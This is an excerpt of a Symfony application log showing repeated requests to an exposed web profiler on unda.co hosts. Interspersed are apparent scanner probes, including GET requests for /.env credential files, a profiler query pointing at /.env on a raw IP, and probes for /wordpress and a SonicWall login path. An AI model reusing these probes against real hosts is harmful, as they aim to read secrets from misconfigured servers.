  4509. [2025-12-18 20:55:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4510. [2025-12-18 21:00:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"993d28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/993d28?panel=time","method":"GET"} []
  4511. [2025-12-18 21:00:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4512. [2025-12-18 21:04:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=request","method":"GET"} []
  4513. [2025-12-18 21:04:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4514. [2025-12-18 21:12:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=cache","method":"GET"} []
  4515. [2025-12-18 21:12:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4516. [2025-12-18 21:23:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=82.22.238.79&limit=10&url=https%3A%2F%2F35.175.10.94%2F.env","method":"GET"} []
  4517. [2025-12-18 21:23:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=82.22.238.79&limit=10&url=https%3A%2F%2F35.175.10.94%2F.env","method":"GET"} []
  4518. [2025-12-18 21:23:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=twig","method":"GET"} []
  4519. [2025-12-18 21:23:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4520. [2025-12-18 21:26:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
  4521. [2025-12-18 21:26:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  4522. [2025-12-18 21:29:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"342871","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/342871/search/results?ip=2.54.30.13&limit=10","method":"GET"} []
  4523. [2025-12-18 21:29:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=2.54.30.13&limit=10","method":"GET"} []
  4524. [2025-12-18 21:33:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=time","method":"GET"} []
  4525. [2025-12-18 21:33:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4526. [2025-12-18 21:36:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  4527. [2025-12-18 21:36:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4528. [2025-12-18 21:36:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4529. [2025-12-18 21:36:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4530. [2025-12-18 21:36:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4531. [2025-12-18 21:36:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4532. [2025-12-18 21:36:09] security.DEBUG: Calling Authentication entry point. [] []
  4533. [2025-12-18 21:37:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  4534. [2025-12-18 21:37:10] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4535. [2025-12-18 21:37:10] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4536. [2025-12-18 21:37:10] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4537. [2025-12-18 21:37:10] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4538. [2025-12-18 21:37:10] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4539. [2025-12-18 21:37:10] security.DEBUG: Calling Authentication entry point. [] []
  4540. [2025-12-18 21:39:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4541. [2025-12-18 21:39:41] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  4542. [2025-12-18 21:43:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=request","method":"GET"} []
  4543. [2025-12-18 21:43:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4544. [2025-12-18 21:44:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4545. [2025-12-18 21:50:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"423f35","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/423f35","method":"GET"} []
  4546. [2025-12-18 21:50:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4547. [2025-12-18 21:52:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=config","method":"GET"} []
  4548. [2025-12-18 21:52:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4549. [2025-12-18 22:00:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=security","method":"GET"} []
  4550. [2025-12-18 22:00:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4551. [2025-12-18 22:01:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"272ff9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/272ff9","method":"GET"} []
  4552. [2025-12-18 22:01:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4553. [2025-12-18 22:06:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
  4554. [2025-12-18 22:06:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  4555. [2025-12-18 22:09:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=twig","method":"GET"} []
  4556. [2025-12-18 22:09:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4557. [2025-12-18 22:09:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=cache","method":"GET"} []
  4558. [2025-12-18 22:09:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4559. [2025-12-18 22:12:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sonicui/7/login/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sonicui/7/login/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4560. [2025-12-18 22:18:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=config","method":"GET"} []
  4561. [2025-12-18 22:18:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4562. [2025-12-18 22:26:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=twig","method":"GET"} []
  4563. [2025-12-18 22:26:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4564. [2025-12-18 22:29:14] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"7d4aba","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/7d4aba/search/results?ip=20.65.194.61&limit=10","method":"GET"} []
  4565. [2025-12-18 22:29:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=20.65.194.61&limit=10","method":"GET"} []
  4566. [2025-12-18 22:30:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4567. [2025-12-18 22:30:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f89e9a","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/f89e9a/search/results?ip=141.95.74.78&limit=10","method":"GET"} []
  4568. [2025-12-18 22:30:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10","method":"GET"} []
  4569. [2025-12-18 22:34:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654","method":"GET"} []
  4570. [2025-12-18 22:34:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  4571. [2025-12-18 22:38:20] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  4572. [2025-12-18 22:39:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"689482","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/689482?panel=exception","method":"GET"} []
  4573. [2025-12-18 22:39:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  4574. [2025-12-18 22:41:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=db","method":"GET"} []
  4575. [2025-12-18 22:41:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  4576. [2025-12-18 22:42:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=time","method":"GET"} []
  4577. [2025-12-18 22:42:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4578. [2025-12-18 22:42:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
  4579. [2025-12-18 22:42:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4580. [2025-12-18 22:43:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemaps.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemaps.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4581. [2025-12-18 22:44:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"9e546f","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/9e546f/search/results?ip=66.249.66.39&limit=10","method":"GET"} []
  4582. [2025-12-18 22:44:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.66.39&limit=10","method":"GET"} []
  4583. [2025-12-18 22:50:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c","method":"GET"} []
  4584. [2025-12-18 22:50:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4585. [2025-12-18 22:52:58] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4586. [2025-12-18 22:53:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  4587. [2025-12-18 22:56:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"599fee","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/599fee?panel=request","method":"GET"} []
  4588. [2025-12-18 22:56:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4589. [2025-12-18 22:57:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=time","method":"GET"} []
  4590. [2025-12-18 22:57:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4591. [2025-12-18 22:59:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"503210","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/503210/search/results?ip=20.65.194.61&limit=10","method":"GET"} []
  4592. [2025-12-18 22:59:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=20.65.194.61&limit=10","method":"GET"} []
  4593. [2025-12-18 22:59:16] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"913d66","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/913d66/search/results?ip=20.65.194.61&limit=10","method":"GET"} []
  4594. [2025-12-18 22:59:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=20.65.194.61&limit=10","method":"GET"} []
  4595. [2025-12-18 23:04:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=twig","method":"GET"} []
  4596. [2025-12-18 23:04:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4597. [2025-12-18 23:08:45] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=src%2FHona%2FApiBundle%2FController%2FAddressController.php&line=250","method":"GET"} []
  4598. [2025-12-18 23:15:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=time","method":"GET"} []
  4599. [2025-12-18 23:15:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4600. [2025-12-18 23:15:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=config","method":"GET"} []
  4601. [2025-12-18 23:15:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4602. [2025-12-18 23:15:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1786c3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1786c3","method":"GET"} []
  4603. [2025-12-18 23:15:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4604. [2025-12-18 23:18:06] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"97fff3","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/97fff3/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  4605. [2025-12-18 23:18:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  4606. [2025-12-18 23:23:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=security","method":"GET"} []
  4607. [2025-12-18 23:23:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4608. [2025-12-18 23:24:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a276d6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a276d6?panel=config","method":"GET"} []
  4609. [2025-12-18 23:24:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4610. [2025-12-18 23:30:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=swiftmailer","method":"GET"} []
  4611. [2025-12-18 23:30:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  4612. [2025-12-18 23:30:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=time","method":"GET"} []
  4613. [2025-12-18 23:30:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4614. [2025-12-18 23:31:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=request","method":"GET"} []
  4615. [2025-12-18 23:31:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
